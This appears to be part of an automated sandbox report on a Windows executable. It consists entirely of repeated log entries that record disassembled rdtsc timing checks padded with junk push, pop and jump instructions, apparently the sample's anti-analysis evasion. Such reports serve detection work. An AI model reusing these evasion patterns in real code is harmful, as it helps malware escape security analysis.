                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE334 second address: CDE33B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE33B second address: CDE340 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE340 second address: CDE346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE657 second address: CDE67F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C80FB5670h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9C80FB566Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE67F second address: CDE683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE7E0 second address: CDE800 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9C80FB5676h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE800 second address: CDE811 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9C81394BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE811 second address: CDE817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE817 second address: CDE833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C81394C08h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE833 second address: CDE839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE975 second address: CDE979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CE18B4 second address: CE18B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CE18B9 second address: CE18D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9C81394C04h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CE1E1A second address: CE1E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CE1E1E second address: CE1E66 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnc 00007F9C81394BF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007F9C81394BF6h 0x00000015 jmp 00007F9C81394BFAh 0x0000001a popad 0x0000001b pushad 0x0000001c jmp 00007F9C81394C05h 0x00000021 pushad 0x00000022 popad 0x00000023 jno 00007F9C81394BF6h 0x00000029 popad 0x0000002a push ecx 0x0000002b jo 00007F9C81394BF6h 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CE1E66 second address: CE1EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F9C80FB5674h 0x0000000c push ebx 0x0000000d jmp 00007F9C80FB5674h 0x00000012 js 00007F9C80FB5666h 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jns 00007F9C80FB5666h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CEB930 second address: CEB934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CEB934 second address: CEB93A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CEB93A second address: CEB966 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F9C81394BFBh 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F9C81394C07h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CE9A05 second address: CE9A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F9C80FB5666h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CE9A16 second address: CE9A45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F9C81394C01h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CE9A45 second address: CE9A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CE9D5E second address: CE9D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CE9D64 second address: CE9D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CEA071 second address: CEA07F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F9C81394BFCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CEA07F second address: CEA09E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 jmp 00007F9C80FB5674h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CEA5C8 second address: CEA5CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CEAE06 second address: CEAE0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CEB60C second address: CEB63A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C06h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9C81394C04h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CEB63A second address: CEB63E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CF02C7 second address: CF02CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CF02CD second address: CF02D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CF02D1 second address: CF02D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CF35A7 second address: CF35AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CF35AD second address: CF35B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CF35B1 second address: CF35B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CF39F5 second address: CF39FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CF39FB second address: CF39FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CF39FF second address: CF3A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CF3A07 second address: CF3A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CF3A0B second address: CF3A1F instructions: 0x00000000 rdtsc 0x00000002 je 00007F9C81394BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F9C81394BF6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CF3A1F second address: CF3A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CF3B43 second address: CF3B4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F9C81394BF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CF3E30 second address: CF3E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CFDBA6 second address: CFDBAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CFBC8B second address: CFBCAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5677h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F9C80FB5666h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CFC163 second address: CFC169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CFC451 second address: CFC457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CFC457 second address: CFC45D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CFC45D second address: CFC463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CFC463 second address: CFC46A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CFC46A second address: CFC477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F9C80FB5666h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CFC70F second address: CFC715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CFC715 second address: CFC724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F9C80FB5666h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CFC724 second address: CFC728 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CFC728 second address: CFC72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CFC72E second address: CFC745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9C81394C03h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CFC9D0 second address: CFC9DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F9C80FB5666h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CFCB55 second address: CFCB68 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9C81394BFCh 0x00000008 push eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CFD9E0 second address: CFD9E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CFD9E4 second address: CFDA17 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F9C81394BFBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F9C81394BF8h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F9C81394C06h 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CFB7FC second address: CFB802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CFB802 second address: CFB823 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9C81394BF6h 0x00000008 jmp 00007F9C81394C07h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CFB823 second address: CFB89D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 je 00007F9C80FB5666h 0x0000000d jnp 00007F9C80FB5666h 0x00000013 popad 0x00000014 pushad 0x00000015 jnl 00007F9C80FB5666h 0x0000001b ja 00007F9C80FB5666h 0x00000021 jmp 00007F9C80FB5679h 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 pushad 0x0000002a jnl 00007F9C80FB5680h 0x00000030 pushad 0x00000031 jmp 00007F9C80FB5679h 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CFB89D second address: CFB8AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D034F0 second address: D03513 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB566Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F9C80FB566Ah 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push edx 0x00000014 pop edx 0x00000015 push ecx 0x00000016 jns 00007F9C80FB5666h 0x0000001c pop ecx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D03513 second address: D0351C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D0351C second address: D03522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D031DE second address: D031EE instructions: 0x00000000 rdtsc 0x00000002 js 00007F9C81394BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D0FE2D second address: D0FE31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D0FE31 second address: D0FE35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D0FE35 second address: D0FE3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D0FE3B second address: D0FE41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D0FE41 second address: D0FE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D0F838 second address: D0F83E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D0F83E second address: D0F849 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007F9C80FB5666h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D11D2F second address: D11D38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D11A88 second address: D11A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D19BD4 second address: D19C29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9C81394BFBh 0x00000008 jne 00007F9C81394BF6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F9C81394BFEh 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F9C81394BFCh 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jns 00007F9C81394C04h 0x00000029 push eax 0x0000002a push edx 0x0000002b je 00007F9C81394BF6h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D19C29 second address: D19C31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D1E4CA second address: D1E4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D1E4D0 second address: D1E4D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D1E4D6 second address: D1E4DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D1E4DB second address: D1E4EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F9C80FB5666h 0x0000000a jg 00007F9C80FB5666h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D1E4EB second address: D1E50F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F9C81394BFAh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F9C81394BFEh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D1E50F second address: D1E51B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F9C80FB5666h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D224D9 second address: D224E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D224E4 second address: D224EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9C80FB5666h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D23C5B second address: D23C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007F9C81394BF6h 0x0000000c jmp 00007F9C81394C07h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D2B10F second address: D2B113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D2B113 second address: D2B117 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D2B117 second address: D2B136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F9C80FB5666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F9C80FB566Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D2B136 second address: D2B13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D2F62E second address: D2F634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D2F7A7 second address: D2F7B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F9C81394BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D2F7B1 second address: D2F7B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D2F916 second address: D2F91A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: D2F91A second address: D2F920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
